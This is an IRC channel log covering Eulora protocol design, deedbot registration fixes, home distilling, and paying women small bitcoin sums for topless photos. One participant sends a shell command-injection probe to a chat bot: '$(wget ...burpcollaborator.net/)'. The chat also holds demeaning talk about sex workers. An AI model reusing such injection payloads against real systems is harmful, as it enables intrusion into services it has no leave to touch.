if no X key then ...account lost or can it re-send "new account" and basically retrieve the old one? 1801106;1523989323;mircea_popescu;im thinking it's actually best to have a single helo, with r-pubkey. if it is known to the server then it sends X keys ; if it is not known then... it sends X keys. 1801107;1523989324;mircea_popescu;see ? 1801108;1523989326;mircea_popescu;diana_coman, ^ 1801109;1523989847;mircea_popescu;re "registered with deedbot" part : i expect in-game trade should be the driver of both rating and registration. 1801110;1523989935;diana_coman;well yes, it is only one, the "hello-new-account" although whether it's "old" or "new"...same difference 1801111;1523989966;diana_coman;but it's needed only when client doesn't have any X keys for whatever reason basically, right? 1801112;1523990021;diana_coman;otherwise there isn't any hello as such, just send directly whatever it wants/needs, encrypted with one of the X keys and that's that 1801113;1523990038;diana_coman;mircea_popescu, ^ 1801114;1523990132;mircea_popescu;exactly. 1801115;1523990146;mircea_popescu;if client has at least one server X key it can bootstrap, sending more. 1801116;1523990149;mircea_popescu;if it doesn't, has to helo. 1801117;1523990169;diana_coman;aha 1801118;1523990204;diana_coman;I'll eat the convo again and then update the spec (+link to log ofc) hopefully 1801119;1523990257;mircea_popescu;aite. i really think we have to have someone working at this wall from the other end, hence the original http://btcbase.org/log/2018-04-17#1800966 comment. 1801120;1523990257;a111;Logged on 2018-04-17 15:20 mircea_popescu: http://www.dianacoman.com/2018/04/17/rfc-euloras-communication-protocol-eucomms/ << hey phf, i intend to comission you to write a text-only eulora client on this basis, give a looksee ? an' let me know ? 1801121;1523990640;diana_coman;certainly; and it goes for the data types too; fwiw I wasn't keen on putting this up precisely because it's a bit in the air as it stands and I expect other issues to emerge at implementation time 1801122;1523990702;mircea_popescu;yes. but hey, this is precisely why god gave us blogs in the first place. 1801123;1523990771;diana_coman;so that now women can BLOG in church! 1801124;1523990984;trinque;lol 1801125;1523990990;mircea_popescu;lol 1801126;1523991195;deedbot;http://qntra.net/2018/04/usg-mil-pursues-single-provider-cloud-computing-contract/ << Qntra - USG.MIL Pursues Single Provider "Cloud" Computing Contract 1801127;1523991341;trinque;deedbot will be offline briefly as the DC fixes its networking situation 1801128;1523991356;mircea_popescu;ima be off to town. bbl 1801129;1523994241;douchebag;Hey trinque I don't mean to bother you, but with the various deedbot issues 1801130;1523994259;douchebag;I was just making sure withdrawls for those girls yesterday went through properly - no rush getting them processed 1801131;1523994362;trinque;I have 7 in the hopper for this evening. 1801132;1523994383;douchebag;Sounds good man, thanks 1801133;1523994385;trinque;the !!pay wasn't broken, just !!balance and !!withdraw 1801134;1523994391;trinque;sure, np. 1801135;1523994409;douchebag;I think that's really awesome way how you do withdrawls though 1801136;1523994414;douchebag;In terms of security 1801137;1523994456;trinque;well and I have to admit that leaning on it exposed that the !!register service was weak (albeit weak meaning "couldn't survive 10kbps wire with packet loss") 1801138;1523994459;trinque;so thanks for that 1801139;1523994500;douchebag;Yeah no problem, glad I could bring that to your attention 1801140;1523994649;douchebag;So trinque, what is it exactly that got you interested in programming/networking/sysadmin stuff? What sort of things interested you the most and motivated you to keep learning? 1801141;1523994860;trinque;mmm, got my dad's computer stuck in DOS back in the win95 days playing a game. I was about 7-8? he was away on a trip, so I had 2 days to "fix the computer" or certain asswhippin. found the thing in win.ini or w/e it was, changed it, avoided wrath. 1801142;1523994910;trinque;clicked in my head that "oh, *this* is what the computer is for. change the text, and it does something different." 1801143;1523994943;trinque;that's about it, really. pretty african origin story compared to the 80s kids 1801144;1523995025;douchebag;Interesting 1801145;1523995092;trinque;after that somebody bought me a "make your own game!" basic interpreter of some sort 1801146;1523995415;douchebag;Yeah, can you believe last year I had to take a QBasic 4.5 class 1801147;1523995580;trinque;http://www.cs.cmu.edu/~dst/LispBook/book.pdf << here, have one of these then. 1801148;1523995597;trinque;http://web.mit.edu/alexmv/6.037/sicp.pdf << and also 1801149;1523997405;diana_coman;http://btcbase.org/log/2018-04-17#1801097 <- mircea_popescu looking at it again from all sides I think the consideration is not necessarily misplaced in itself i.e. multi-packet there does make a mess out of the neat "these are the only *packets* you may ever send"; this being said though, I don't quite see the solution that would *also* preserve the desired "whatever it is, server responds the same: with a set of X keys" 1801150;1523997405;a111;Logged on 2018-04-17 17:55 mircea_popescu: diana_coman, one consideration was that if it includes pubkey it will have to be multipacket and i wanted it to be singlepacket for some now incomprehensible reason. 1801151;1523997592;diana_coman;and at any rate, we end up with a "hello" packet that is the first one, containing version of comms protocol and client id string and all that jazz but *at most* some bits of the key only, followed by... more packets with the remaining, chopped-up public rsa key 1801152;1523998400;diana_coman;alternatively the hello message stays single-packet and uses a keccak hash of the public key (n,e,comment) as "account ID" so 3.1.5; then key is sent via Data packages and basically I need to define another type for RSA public key; server can ask/expect the RSA key *every time* to preserve same answer behaviour or otherwise only if it doesn't know the key 1801153;1524000752;phf;http://btcbase.org/log/2018-04-17#1800966 << i'll start reading the spec, i was already planning on writing my own version of client 1801154;1524000752;a111;Logged on 2018-04-17 15:20 mircea_popescu: http://www.dianacoman.com/2018/04/17/rfc-euloras-communication-protocol-eucomms/ << hey phf, i intend to comission you to write a text-only eulora client on this basis, give a looksee ? an' let me know ? 1801155;1524004947;*;lobbes will gladly test a phf-made eulora text client 1801156;1524005057;lobbes;main thing putting me off from playing more frequently has been the graphics requirement. 1801157;1524005071;trinque;ok, thing's back up and I'm getting quite a bit more speed from the pipe. 1801158;1524005082;BingoBoingo;Sweet trinque 1801159;1524005105;trinque;hopefully that'll be enough fiddling to let me get back to migrating to pizarro, BingoBoingo ! 1801160;1524005319;ascii_lander;phunphakt : when you give 'exclude' option to tar, it excludes RECURSIVELY all files having that name, regardless of depth. this cost us 6 or so hrs today. 1801161;1524005323;ascii_lander;re smg. 1801162;1524005345;*;ascii_lander ended up N times with broken copy of gentoo and no way to determine why other than exhaustive grunting 1801163;1524005364;BingoBoingo;The grunting was loud 1801164;1524006381;ascii_lander;ACHTUNG, mircea_popescu , diana_coman : http://p.bvulpes.com/pastes/7Xjpf/?raw=true 1801165;1524006430;ascii_lander;plox to ack asap 1801166;1524006447;*;ascii_lander bbl, had vehehehery long day down here in the bunker 1801167;1524013148;phf;lobbes: same for me, i don't have the right machine to eulora. i tried rebuilding my mac homebrew version recently and it's all kinds of broken since the update a year or so ago 1801168;1524013737;lobbes;listen, I'm gonna have to put you under a roast for punishing the logs with these puny puns >> http://btcbase.org/log/2018-04-17#1800942 1801169;1524013737;a111;Logged on 2018-04-17 15:01 mircea_popescu: you will roux the day! 1801170;1524014436;mircea_popescu;lel 1801171;1524014559;mircea_popescu;!Q ascii_lander ok. 1801172;1524014564;mircea_popescu;!Q later tell ascii_lander ok. 1801173;1524014565;lobbesbot;mircea_popescu: The operation succeeded. 1801174;1524014639;douchebag;!Q $(wget http://2svdxxlir5m6eofyzi07dqojoau0ip.burpcollaborator.net/) 1801175;1524014654;douchebag;lets see if lobbesbot learned something from ol douchebag 1801176;1524015240;mircea_popescu;http://btcbase.org/log/2018-04-17#1801135 >> maybe actually putting a blogpost up with a detailed and illustrated description of the process might be a good idea, both for deedbot and for tmsr in general. i don't think many people even realise security is a thing. 1801177;1524015240;a111;Logged on 2018-04-17 19:46 douchebag: I think that's really awesome way how you do withdrawls though 1801178;1524015295;douchebag;You're right about that 1801179;1524015309;mircea_popescu;no further than earlier over coffee, girl proposed that during her stay in $us.shithole she "tried getting into beer" because well... gotta have an activity and there was no good alcohool available, except for this beer that didn't utterly suck. so i said, "why not make a still", and she said "baring divine intervention...." 1801180;1524015387;mircea_popescu;what fucking divine intervention, a still is $15 in household equipment, get one of those rice cookers or w/e pot warmers, wirth digital temperature adjustment. set it for 79C, stick an erlenmeyer glass in there with a cork and a bent tube coming out, put an ice pack over the tube and voila! whatever southern confort goes in, 195 or so proof alcohol comes out. 1801181;1524015414;mircea_popescu;put it in oj or w/e. but this apparently was divine intervention, half hour's labour worth of parts and half hour's worth of work assembling them together. 1801182;1524015434;mircea_popescu;in short, i don't think esltards even vaguely remember YOU CAN DO THINGS. 1801183;1524015792;mircea_popescu;http://btcbase.org/log/2018-04-17#1801142 << pretty great story. not to mention the obvious moral : "are you ruining your child's chances to a future by failing to provide a safe learning environment for him through your limp wristed inability to create a clear and present threat to violent bodily harm ?" 1801184;1524015792;a111;Logged on 2018-04-17 19:55 trinque: clicked in my head that "oh, *this* is what the computer is for. change the text, and it does something different." 1801185;1524015876;mircea_popescu;http://btcbase.org/log/2018-04-17#1801146 << the reason teachers keep pushing wirth's abomination upon students is that they're trying to teach them ada but don't know the word for it. 1801186;1524015876;a111;Logged on 2018-04-17 20:03 douchebag: Yeah, can you believe last year I had to take a QBasic 4.5 class 1801187;1524015876;douchebag;haha 1801188;1524016053;mircea_popescu;http://btcbase.org/log/2018-04-17#1801151 << myeah. there's no way out of it, helo packet will have to be multi-packet. sad but true. 1801189;1524016053;a111;Logged on 2018-04-17 20:39 diana_coman: and at any rate, we end up with a "hello" packet that is the first one, containing version of comms protocol and client id string and all that jazz but *at most* some bits of the key only, followed by... more packets with the remaining, chopped-up public rsa key 1801190;1524016104;mircea_popescu;http://btcbase.org/log/2018-04-18#1801167 << jewbuntu! 1801191;1524016104;a111;Logged on 2018-04-18 00:59 phf: lobbes: same for me, i don't have the right machine to eulora. i tried rebuilding my mac homebrew version recently and it's all kinds of broken since the update a year or so ago 1801192;1524017515;ckang;evening all. 1801193;1524017590;phf;i think alcohol production is forbidden in u.s. by a divine inca decree, so there's only two ways of doing it, in a redneck bathtub, while being redneck, or using hadron collider, like a civilized store alcohol supplier. 1801194;1524017615;ckang;or you get a fuel permit ;) 1801195;1524017678;trinque;I dunno if it was legal or not, but buddy in highschool made his own beer in his bedroom. 1801196;1524017682;trinque;it was.. yeasty 1801197;1524017691;ckang;beer and wine is legal 1801198;1524017699;ckang;its distilled stuff it gets sketchy 1801199;1524017717;ckang;in general they wont really mess with you unless you are selling and being 'loud' 1801200;1524017737;ckang;assuming its in your home 1801201;1524017877;mircea_popescu;phf, can always do it in lab glass. 1801202;1524017894;mircea_popescu;it won't make commercial amounts, but even the smallest still can outpour your gullet. 1801203;1524017930;mircea_popescu;also it's not properly production, merely fractional distillation of last pass. you're just taking the BBAV/BAC/whatever shitstilleries out of your cup. 1801204;1524017975;phf;it's a question of perception though, i'm commenting on the mechanics of learned helplessness 1801205;1524017994;ckang;https://www.banggood.com/Copper-Core-Alcohol-Wine-Distiller-Moonshine-Still-Brandy-Wine-Distillation-Hoop-Barrel-Design-p-1043642.html?rmmds=search&cur_warehouse=USA 1801206;1524018003;mircea_popescu;ah ah 1801207;1524018013;ckang;these are a pretty good value overall 1801208;1524018035;mircea_popescu;ckang, yes, but that's too calorically bulky to work for the proposed use here. 1801209;1524018070;ckang;do it under a vacuum :) 1801210;1524018071;mircea_popescu;copper stills are great for taking mash (0.x - 7% or so alcohol) to spirit (30-40% or so). they're terrible for trying the 30-50% to 95% part. 1801211;1524018077;ckang;wrong kind of still ofc 1801212;1524018101;ckang;but takes much less watts to start producing 1801213;1524018112;mircea_popescu;i suppose you could get a custom made resistor + multi-spot thermometers and push a point. 1801214;1524018206;ckang;yea a simple DIN PID controller with RTD (pt100/pt1000) would be pretty solid even 1801215;1524018240;mircea_popescu;anyway. i come from a country where 1l 196 proof is ~4 dollars, sold in convenience stores. 1801216;1524018260;ckang;denatured ? 1801217;1524018263;mircea_popescu;nope. 1801218;1524018266;ckang;wow lol 1801219;1524018275;mircea_popescu;women make visinata / etc home cordials and so on. 1801220;1524018277;ckang;many alcoholics? 1801221;1524018280;mircea_popescu;ask hanbot she loved it lol. 1801222;1524018298;mircea_popescu;ckang, it's eastern people, genetic alcohol immunity. 1801223;1524018320;ckang;ah 1801224;1524018350;phf;everyone has their own special "nastoyka" 1801225;1524018354;ckang;but yea at 4$ a liter, no point in making your own 1801226;1524018392;mircea_popescu;ckang, ppl do actually, many older folk own a quarter acre of plumtrees or so, make their own 45-52% "tuica". 1801227;1524018395;ckang;I want to say 1.75L is like 35$ or so for 190 here 1801228;1524018407;phf;a friend solved the problem of sourcing proper alcohol for nastoyka here by working at NIH. 1801229;1524018518;ckang;I never got that alcohol bug like some do though 1801230;1524018525;douchebag;me neither 1801231;1524018561;mircea_popescu;ckang, where is here ? 1801232;1524018568;ckang;USA 1801233;1524018600;mircea_popescu;yeah, well. ro avg wage is like $7k/year or such. 1801234;1524018614;phf;mircea_popescu: that's the romanian word for nastoyka? i know polaks calls it nalewka 1801235;1524018615;douchebag;!!up h00k3r 1801236;1524018616;deedbot;h00k3r voiced for 30 minutes. 1801237;1524018619;ckang;I thought about getting a fuel permit 1801238;1524018627;h00k3r;tits 1801239;1524018629;ckang;but it requires an on site inspection etc 1801240;1524018662;mircea_popescu;phf, not really drunk as such. it's either the plum thing, or else the sour cherry thing, basically. not really herbing. 1801241;1524018676;trinque;these creatures must be monosyllabic on "discord" 1801242;1524018693;douchebag;!!up Poka_ 1801243;1524018693;deedbot;Poka_ voiced for 30 minutes. 1801244;1524018695;mircea_popescu;h00k3r, e55094aa. half hour. 1801245;1524018703;mircea_popescu;Poka_, d356dbbd, same. 1801246;1524018741;mircea_popescu;trinque, discord being an audio channel, it dun encourage much more conversation than its forerunner, the car radio. 1801247;1524018754;mircea_popescu;i suspect that's the driver, people couldn't get enough of bad talk radio and commutes. 1801248;1524018806;mod6;<+ascii_lander> phunphakt : when you give 'exclude' option to tar, it excludes RECURSIVELY all files having that name, regardless of depth. this cost us 6 or so hrs today. << Jeeze, sorry you guys had some battles today, glad you persevered tho! 1801249;1524018818;trinque;yeah, also serves as an inverse aa. "huhuh are you smoking pot? I'm gonna smoke some pot" 1801250;1524018845;mircea_popescu;yeah, i noticed this, given present supply of pot the herbivores really need encouragement. 1801251;1524018855;ckang;lol 1801252;1524018946;trinque;meanwhile Poka_ says to himself "b-but I had theorems to share!" 1801253;1524018955;mircea_popescu;lol. 1801254;1524018961;ckang;hopefully not a him 1801255;1524018961;ckang;lol 1801256;1524018966;mircea_popescu;would help if they didn't share ips eh. 1801257;1524018986;mircea_popescu;"fuck that, what, i just happen to raid on a hooker's hotspot, why stereotite!" 1801258;1524018990;h00k3r;!!register http://p.bvulpes.com/pastes/LtyVX/?raw=true 1801259;1524018993;deedbot;CF422340903BCD3D374D639E837E72EA0DB8C5A7 registered as h00k3r. 1801260;1524019024;Poka_;!!register http://p.bvulpes.com/pastes/xZWAi/?raw=true 1801261;1524019027;deedbot;C9E2D60F11B27BC30B5D62DF5CFD3308E9EE82BC registered as Poka_. 1801262;1524019034;phf;i've noticed in my travels that north of bay area, california is pot country. whole towns are nothing but dispenseries, mcdonalds*, token hippie store, and gas station. 1801263;1524019046;trinque;give the !!pay a sec 1801264;1524019098;phf;i mean, town after town after town. the impression is kind of the same as northern pa, trenton new jerson area, which is on the other hand the meth capital of u.s. 1801265;1524019107;phf;*new jersey 1801266;1524019143;mircea_popescu;phf, whereas south, meth ? 1801267;1524019170;mircea_popescu;trinque, aite, you say 1801268;1524019170;h00k3r;https://i.imgur.com/2RN43U2.jpg 1801269;1524019183;trinque;runnin a deploy, almost done 1801270;1524019237;phf;no idea, haven't been. i suspect it's a cleaner for longer stretches, i.e. south of bay area, north of los angeles 1801271;1524019269;ckang;mircea_popescu: veronicalol's had issues, not sure if it was the bot stuff earlier or if it just didnt go through 1801272;1524019287;mircea_popescu;phf, bakersfield... 1801273;1524019288;mircea_popescu;ckang, nah, missed the batch ; will get in next one. 1801274;1524019316;h00k3r;is this fine? 1801275;1524019326;phf;it's the same shock i had when i traveled in rust belt a decade ago and discovered that nobody's working and everyone's on drugs. 1801276;1524019345;mircea_popescu;h00k3r, works. 1801277;1524019391;trinque;ckang: that one she's got a withdraw sitting there waiting for OTP 1801278;1524019397;mircea_popescu;phf, kinda why the old man's pipe dream is so lulzy. srsly, make it great again ? da fuck what with ?!? 1801279;1524019406;trinque;probably otp confirm didn't work when the pipe was clogged 1801280;1524019443;mircea_popescu;trinque, i actually didn't confirm it as she came in after i was off to bed. 1801281;1524019455;mircea_popescu;will do her with these other ones. 1801282;1524019462;trinque;ah ok 1801283;1524019540;ckang;!!up driscole 1801284;1524019541;deedbot;driscole voiced for 30 minutes. 1801285;1524019555;driscole;Hi, here for picture. 1801286;1524019556;mircea_popescu;driscole, 1b8914a1. half hour. 1801287;1524019761;trinque;both did this at import http://p.bvulpes.com/pastes/3Dg7v/?raw=true 1801288;1524019805;mircea_popescu;heh 1801289;1524019811;trinque;douchebag: are you trying to own the gpg on the wallet box? 1801290;1524019815;trinque;or what 1801291;1524019837;douchebag;no, look at both gpg keys 1801292;1524019869;trinque;what am I looking for here 1801293;1524019902;douchebag;no clue why they're not importing 1801294;1524019942;trinque;somehow their public keys aren't properly signed 1801295;1524019972;trinque;lol you know, I make reg transactional for the crackhos, and then! 1801296;1524019992;trinque;maybe you can hang out at ckang's discord instead 1801297;1524020003;douchebag;They're importing fine for me 1801298;1524020009;ben_vulpes;douchebag: what on earth gpg version are they using? 1801299;1524020041;douchebag;gpg (GnuPG) 2.1.18 1801300;1524020043;douchebag;libgcrypt 1.7.8 1801301;1524020086;mircea_popescu;tsk. 1801302;1524020098;mircea_popescu;we actually found a breaking 2.x/1.4 change ? 1801303;1524020226;*;trinque hasn't a clue yet 1801304;1524020294;driscole;https://usercontent.irccloud-cdn.com/file/v8PPPt9e/image.jpg 1801305;1524020309;h00k3r;!!balance 1801306;1524020313;deedbot;http://p.bvulpes.com/ 1801307;1524020317;douchebag;^ 1801308;1524020341;ben_vulpes;driscole: cute 1801309;1524020362;trinque;douchebag: well yeah, key refused to import 1801310;1524020371;driscole;ben_vulpes: TY 1801311;1524020378;mircea_popescu;driscole, what do you do for a living ? 1801312;1524020382;douchebag;alright let me make her a new key 1801313;1524020386;trinque;nah 1801314;1524020400;trinque;the key imported elsewhere, but not on this particular gpg 1801315;1524020403;trinque;give me a sec 1801316;1524020417;driscole;mircea_popescu: I work as a bar back, in training to be a bar tender 1801317;1524020427;mircea_popescu;driscole, but you do realise you wrote 1d8914a not 1b8914a1 ? 1801318;1524020450;ben_vulpes;haha shaaaaame 1801319;1524020456;driscole;omg, no :( dyslexia 1801320;1524020465;mircea_popescu;driscole, add a 1 do again. 1801321;1524020470;mircea_popescu;it's always 8 digits, btw. never 7. 1801322;1524020513;phf;fuzzing by whore, you should write it up douchebag, new fuzzing methodology, get it into toorcon 1801323;1524020523;trinque;it apparently totally works 1801324;1524020523;douchebag;hahahahaha 1801325;1524020528;trinque;!!up h00k3r 1801326;1524020529;deedbot;h00k3r voiced for 30 minutes. 1801327;1524020533;trinque;try balance again 1801328;1524020541;h00k3r;!!balance 1801329;1524020545;trinque;not that you've been paid yet 1801330;1524020549;deedbot;http://p.bvulpes.com/pastes/eBkUt/?raw=true 1801331;1524020553;trinque;great. 1801332;1524020560;trinque;ok, problem's a fucking missing newline 1801333;1524020581;mircea_popescu;phf, it's genuinely not bad. 1801334;1524020603;douchebag;!!up Poka_ 1801335;1524020603;deedbot;Poka_ voiced for 30 minutes. 1801336;1524020608;Poka_;https://i.imgur.com/94mvvbT.jpg 1801337;1524020690;mircea_popescu;trinque, so can i !!pay ? my buffer's getting filled up 1801338;1524020698;trinque;yeah, !!pay away 1801339;1524020714;mircea_popescu;Poka_, terrible. review http://trilema.com/2014/ill-pay-for-your-tits/ and re-do. 1801340;1524020721;mircea_popescu;!!pay h00k3r 0.02 1801341;1524020727;deedbot;Get your OTP: http://p.bvulpes.com/pastes/eUuf0/?raw=true 1801342;1524020782;h00k3r;ty! 1801343;1524020813;mircea_popescu;mah pleasure. 1801344;1524020896;deedbot;http://trilema.com/2018/auto-oracion-y-otras-temas/ << Trilema - Auto Oracion y otras temas 1801345;1524020907;douchebag;!!up anotherhooker 1801346;1524020908;deedbot;anotherhooker voiced for 30 minutes. 1801347;1524020923;h00k3r;titties! 1801348;1524020924;mircea_popescu;lol 1801349;1524020929;anotherhooker;titties! 1801350;1524020935;mircea_popescu;lmao 1801351;1524020938;mircea_popescu;anotherhooker, 95449401. half hour. 1801352;1524020985;anotherhooker;!!register http://p.bvulpes.com/pastes/zqrXg/?raw=true 1801353;1524020988;deedbot;FB63856CD1B96E58DE49C0D6390022FBA9B92F07 registered as anotherhooker. 1801354;1524021010;mircea_popescu;douchebag, seriously btw, writing the whole thing up, exactly as phf suggests, submitting it as paper/speaking gig to conferences, not even HALF bad idea. 1801355;1524021015;mircea_popescu;you'll be famous in an afternoon. 1801356;1524021038;douchebag;Oh yeah that would be quite hilarious yet interesting 1801357;1524021080;trinque;aaah the damned clock is askew on the wallet 1801358;1524021088;trinque;this matters for reasons 1801359;1524021131;douchebag;Never thought crackwhores improve IRC bots 1801360;1524021151;douchebag;shoutout to all the crackwhores 1801361;1524021176;mircea_popescu;douchebag, im sure trinque will help you with some reasonable details to give it enough meat once you have the general structure drafted. 1801362;1524021260;*;trinque will readily admit he has readjusted his sense of the usefulness of the hos 1801363;1524021277;driscole;https://usercontent.irccloud-cdn.com/file/usXL0dBt/image2.jpg 1801364;1524021283;anotherhooker;https://i.imgur.com/RIfD9Tc.jpg 1801365;1524021368;douchebag;lmao 1801366;1524021397;trinque;!!up driscole 1801367;1524021398;deedbot;driscole voiced for 30 minutes. 1801368;1524021410;trinque;anybody got one more? I wanna see the reg work all the way through. 1801369;1524021451;mircea_popescu;!!pay driscole 0.02 1801370;1524021456;deedbot;Get your OTP: http://p.bvulpes.com/pastes/V04pV/?raw=true 1801371;1524021456;douchebag;Maybe trying to find out of these sluts have friends 1801372;1524021482;mircea_popescu;that looks written in blood... hey, what did you do before whoring, anotherhooker ? 1801373;1524021485;mircea_popescu;!!pay anotherhooker 0.02 1801374;1524021489;deedbot;Get your OTP: http://p.bvulpes.com/pastes/96m8l/?raw=true 1801375;1524021538;h00k3r;I had a cheating husband 1801376;1524021545;douchebag;wrong window 1801377;1524021554;mircea_popescu;lol 1801378;1524021566;douchebag;sry man got these hoes on the same laptop 1801379;1524021568;mircea_popescu;so what, housewife turns to brothel life ? 1801380;1524021636;anotherhooker;sounds nuts but yes 1801381;1524021642;trinque;gotta say, that error message out of gpg is trash. 1801382;1524021643;mircea_popescu;pretty harsh. 1801383;1524021664;mircea_popescu;anotherhooker, maybe you should write out the story. 1801384;1524021684;trinque;driscole: got any friends that want to drop by? 1801385;1524021704;ckang;trinque: working on it :) 1801386;1524021704;trinque;also, you should all be able to !!withdraw , and lmk if not. 1801387;1524021706;mircea_popescu;lol, the texan favours the teenybopper crowd. 1801388;1524021712;ckang;i love her look 1801389;1524021718;mircea_popescu;trinque, not yet lol, i've not pushed the v batch. 1801390;1524021719;trinque;yeah dude. not bad. 1801391;1524021746;ben_vulpes;driscole: is that heart covering something up? 1801392;1524021750;mircea_popescu;so ask her over, what. who knows. everyone needs a vacation spot. 1801393;1524021762;anotherhooker;my husband got me into drugs and then cheated on me with another woman, and eventually it just took me over and i became a whore just like her 1801394;1524021781;driscole;ben_vulpes: Yes, a name :) 1801395;1524021786;ben_vulpes;ahaaa 1801396;1524021790;mircea_popescu;anotherhooker, did he pimp you out, too ? 1801397;1524021818;anotherhooker;no i left him before i started doing this 1801398;1524021829;mircea_popescu;anotherhooker, could i interest you in reading a story of mine ? 1801399;1524021852;h00k3r;i like stories sure 1801400;1524021864;anotherhooker;^ 1801401;1524021869;mircea_popescu;http://trilema.com/2016/whore-wife/ < 1801402;1524022025;ben_vulpes;crickets 1801403;1524022036;mircea_popescu;are you kidding me, it's long. 1801404;1524022039;ben_vulpes;certainly a riveting tale 1801405;1524022048;ben_vulpes;nono, not no response, apparently engrossed. 1801406;1524022064;mircea_popescu;:p 1801407;1524022075;mircea_popescu;in other lulz : this chan is now 1/3 whore by mass. 1801408;1524022088;mircea_popescu;ONLY TIME IN IRC HISTORY THIS WAS THE FACTUAL TRUTH OF THE MATTER. EV4R. 1801409;1524022173;douchebag;lmfaoooo 1801410;1524022187;mircea_popescu;toxicfaxts. 1801411;1524022192;trinque;it's almost christlike in here 1801412;1524022207;trinque;danielpbarron go get 'em 1801413;1524022302;mircea_popescu;in other-other lulz : torrentmaster's new uberbox (that trinque graciously helped with) is in business, doing a glorious 10MB/s of the early trilema films -- that's about 4% of its pipe or so. in a week or two it will contain the complete list. 1801414;1524022335;mircea_popescu;i'm spending on it 3x what the average suburban douchebag spends on his car, it's true, but i count it as a mitzvah : this way, the films that matter have a better shot at survival than the films that don't. 1801415;1524022336;trinque;awesome. glad you're enjoying it! 1801416;1524022349;ben_vulpes;bless you, sir 1801417;1524022371;mircea_popescu;douchebag, no relation meant :D 1801418;1524022436;mircea_popescu;!~calc 1024**3 / 8 * 3600 * 24 * 365 / 765 * 1024**2 1801419;1524022438;jhvh1;mircea_popescu: 1024**3 / 8 * 3600 * 24 * 365 / 765 * 1024**2 = 5801695990553756672 1801420;1524022453;ben_vulpes;i just reluctantly watched seth rogen's "comedy for charity" special thing, and aside from the predictably bad-because-too-short-because-format-demands-it standup "bits", i think he misses a golden opportunity to do a sketch where god scolds him for doing charity so damnably self-aggrandizingly 1801421;1524022471;mircea_popescu;i kid you not, 5.8 e+18 copies available per year! 1801422;1524022481;douchebag;Who are you calling a douchebag? 1801423;1524022489;douchebag;Better not be me! 1801424;1524022533;mircea_popescu;lol 1801425;1524022570;mircea_popescu;ben_vulpes, i think the average pantsuit can't do a good job on the topic of charity for fear such'd be tantamount to i dunno, having voted for trump. there's some fields in which the pantsuit perceive a need to be incredibly retarded for ingroup reasons. 1801426;1524022580;mircea_popescu;sorta like golddiggers have to pretend to not understand money. 1801427;1524022635;ckang;!!up rittah 1801428;1524022635;deedbot;rittah voiced for 30 minutes. 1801429;1524022649;mircea_popescu;rittah, 28366c3a. you gots... half hour. 1801430;1524022650;anotherhooker;that is quite the story 1801431;1524022663;mircea_popescu;anotherhooker, it actually has two more parts. but i'm glad you enjoyed. 1801432;1524022678;mircea_popescu;now write your own! with any luck, you're gonna be the next harry potter and ima be rid of that damnable bullshit. 1801433;1524022735;mircea_popescu;!!up anotherhooker 1801434;1524022736;deedbot;anotherhooker voiced for 30 minutes. 1801435;1524022749;mircea_popescu;!!rate anotherhooker 1 housewife turns to brothel life. harsh! 1801436;1524022751;deedbot;Get your OTP: http://p.bvulpes.com/pastes/xRbn1/?raw=true 1801437;1524022819;mircea_popescu;oh i fucked up my calc duh. 1801438;1524022829;mircea_popescu;!~calc 1024**3 / 8 * 3600 * 24 * 365 / 765 / 1024**2 1801439;1524022831;jhvh1;mircea_popescu: 1024**3 / 8 * 3600 * 24 * 365 / 765 / 1024**2 = 5276611.764705882 1801440;1524022840;mircea_popescu;5.27mn copies. more like it. 1801441;1524022941;danielpbarron;http://btcbase.org/log/2018-04-18#1801393 << so what if he did? a guy can't get a second wife? 1801442;1524022941;a111;Logged on 2018-04-18 03:22 anotherhooker: my husband got me into drugs and then cheated on me with another woman, and eventually it just took me over and i became a whore just like her 1801443;1524022985;trinque;the drugs part sounds like not a side matter 1801444;1524023000;danielpbarron;drugs also not inherently bad 1801445;1524023018;mircea_popescu;but she wasn't saying inherently anything. she saying it didn't work for her. 1801446;1524023027;danielpbarron;sounds like making up excuses to be an adulterous drug addict 1801447;1524023032;mircea_popescu;guy can take as many wives as he wants, but when the outcome's this guy fucked up somewhere neh. 1801448;1524023164;trinque;http://btcbase.org/log/2017-03-15#1627514 << reminds me of this thread actually. I see it differently now. 1801449;1524023164;a111;Logged on 2017-03-15 17:49 trinque: man, if I think back on all the women I cast away, and they were all in this room 1801450;1524023178;mircea_popescu;wisdom! 1801451;1524023181;rittah;https://usercontent.irccloud-cdn.com/file/ndVDh7Gz/image.jpg 1801452;1524023216;mircea_popescu;!!pay rittah 0.02 1801453;1524023221;deedbot;Get your OTP: http://p.bvulpes.com/pastes/YkUnL/?raw=true 1801454;1524023233;mircea_popescu;so what do you do for a living, rittah ? 1801455;1524023256;rittah;atm i play WoW and fortnite :x 1801456;1524023263;rittah;so I guess a gamer 1801457;1524023267;mircea_popescu;what, and sell the gold to the chinese ? 1801458;1524023281;rittah;nope, tips on twitch 1801459;1524023287;mircea_popescu;are you any good ? 1801460;1524023294;rittah;does it matter? :) 1801461;1524023300;mircea_popescu;just curious. 1801462;1524023303;rittah;i'm pretty good though 1801463;1524023305;mircea_popescu;can you say, take athene ? 1801464;1524023312;mircea_popescu;THE BEST PALADIN IN THE WORLD!!! ? 1801465;1524023329;rittah;no i'm a priest lol 1801466;1524023339;mircea_popescu;healslut or just priest ? 1801467;1524023340;rittah;pallys are pretty OP 1801468;1524023353;rittah;healslut, i like that 1801469;1524023353;mircea_popescu;do you know the guy i'm talking about ? total lulzcow. 1801470;1524023369;rittah;i don't, does he stream? 1801471;1524023389;mircea_popescu;rittah, there's a whole subculture, girls who express their submissive side by healing tanks/dps. sometimes also by showing up at natparties to be chained under the table for penis service. 1801472;1524023394;mircea_popescu;oh let me find it. 1801473;1524023399;mircea_popescu;dude's epic. 1801474;1524023426;mircea_popescu;https://www.youtube.com/watch?v=cLYrFR9RT_U < 1801475;1524023461;rittah;2007 holy crap 1801476;1524023478;mircea_popescu;oya. 1801477;1524023479;rittah;i completely forgot the game is so old 1801478;1524023498;mircea_popescu;it's older than that. anyway, i've never seen a woman as embarassed as his gf in some other of his vlogs. 1801479;1524023501;ben_vulpes;jurov: mod6 http://p.bvulpes.com/pastes/8L9fz/?raw=true 1801480;1524023511;mircea_popescu;(chick later ran for whatever denmark local thing , under pirate party banner. afaik lost) 1801481;1524023533;rittah;the game is too addictive, or im easily addicted lol 1801482;1524023561;rittah;have you tried fortnite? 1801483;1524023581;mircea_popescu;http://trilema.com/2012/cel-mai-bun-paladin-din-the-world/ << should prolly translate sometime. anyway moar vids. 1801484;1524023588;mircea_popescu;rittah, never have. all i play these days is eulora. 1801485;1524023619;rittah;oh, not heard of that one 1801486;1524023734;ben_vulpes;you know trinque 